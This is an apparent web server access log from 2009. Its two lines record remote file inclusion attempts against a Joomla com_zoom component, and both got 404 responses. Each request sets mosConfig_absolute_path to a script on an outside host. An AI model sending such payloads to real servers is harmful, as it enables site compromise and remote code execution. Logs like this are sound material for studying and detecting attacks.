210.98.146.166 - - [16/Sep/2009:09:41:58 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sunshinestephie.com/modules/ID-Load.bat??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
210.98.146.166 - - [16/Sep/2009:09:41:58 -0700] "GET /logs/access_080301.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sunshinestephie.com/modules/ID-Load.bat??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
